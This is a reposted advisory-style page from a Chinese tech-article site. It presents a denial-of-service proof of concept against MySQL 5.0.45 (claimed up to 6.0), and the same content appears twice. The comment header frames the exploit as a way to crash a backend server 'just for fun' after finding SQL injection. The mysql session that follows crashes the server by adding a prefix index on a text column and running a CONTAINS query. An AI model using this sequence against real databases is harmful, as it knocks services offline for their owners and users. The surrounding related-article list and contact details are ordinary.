电话
400 9058 355
mysql 5.0.45 (修改)拒绝服务漏洞
2026-01-16 11:56:35 作者:用户投稿
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
猜你喜欢
- 1一些技巧性实用js代码小结
- 2JS实现字符串转驼峰格式的方法
- 3MSSQL 计算两个日期相差的工作天数的
- 4概述一个页面从输入URL到页面加载完的过
- 5CSS 布局一个漂亮的滑块
- 6担起净化网络环境责任 IDC行业在发展中
- 7asp 通用修改和增加函数代码
- 8php面向对象全攻略 (九)访问类型
- 9使用jQuery简化Ajax开发 Aja
- 10zabbix利用python脚本发送报警
- 11MySQL 使用 SSL 连接配置详解
- 12详解jQuery简单的表格应用
- 13Android 关于Expandable
- 14JS限制条件补全问题实例分析
- 15简单理解js的冒泡排序
- 16Linux 监控文件被什么进程修改(详解
- 17Win2003 系统服务器防火墙
- 18移动端日期插件Mobiscroll.js
- 19谈谈如何手动释放Python的内存
- 20Android PopupWindow全
- 21Javascript 两个窗体之间传值实
- 22extjs 学习笔记(二) Ext.El
- 23原生js验证简洁注册登录页面
- 24scroll事件实现监控滚动条并分页显示
- 25php面向对象全攻略 (八)重载新的方法
- 26mysql 编码设置命令
- 27Mootools 1.2教程 输入过滤第
- 28java连接Oracle数据库的方法解析
- 29js实现获取鼠标当前的位置
- 30regini dos下更改注册表权限的工
- 31javascript Range对象跨浏
- 32Python 文件操作实现代码
- 33Java表单重复提交的避免方法
- 34PHP parse_url 一个好用的函
- 35张剑光 的大学四年,留给学弟学妹 转载
- 36关于Flex 初始化的research
- 37JS、CSS文字切换,定时交替,代码精简
- 38Flex Bindable 的用法
- 39SQL 语句优化方法30例
- 40详解阿里云nginx服务器多站点的配置
- 41浅谈Android官方MVP架构解读
- 42Python中的Function定义方法
- 43使用PHP下载CSS文件中的所有图片【几
- 44新10种领带的打法 图文教程
- 45sqlserver 中charindex
- 46JS作用域闭包、预解释和this关键字综
- 47实例解析angularjs的filter
- 48ASP 三层架构 &a
- 49C++ 双链表的基本操作(详解)
- 50php 不同编码下的字符串长度区分
联络方式:
400 9058 355
邮箱:8955556@qq.com
Q Q:8955556
微信二维码 
我们猜你喜欢
-
Android自定义控件实现底部菜单(下
这篇文章主要为大家详细介绍了Android自定义控件实现底部...
-
Android中Toolbar随着Scr
这篇文章主要介绍了Android中Toolbar随着Scro...
-
Java 图表类库详解
本文主要介绍了Java图表类库的相关知识。具有很好的参考价值...
-
GIt的基本操作详解
本文主要介绍了GIt的基本操作。具有很好的参考价值,下面跟着...
-
详解Linux进程间通信——使用共享内存
共享内存是在两个正在运行的进程之间共享和传递数据的一种非常有...
-
Android自定义相机实现定时拍照功能
这篇文章主要为大家详细介绍了Android自定义相机实现定时...
-
CentOS6.5 上部署 MySQL5
这篇文章主要介绍了CentOS6.5 上部署 MySQL5....
-
Vue结合原生js实现自定义组件自动生成
这篇文章主要介绍了Vue结合原生js实现自定义组件自动生成示...
-
Python中struct模块对字节流/
最近在学习python网络编程这一块,在写简单的socket...
-
微信小程序 数据交互与渲染实例详解
这篇文章主要介绍了微信小程序 数据交互与渲染实例详解的相关资...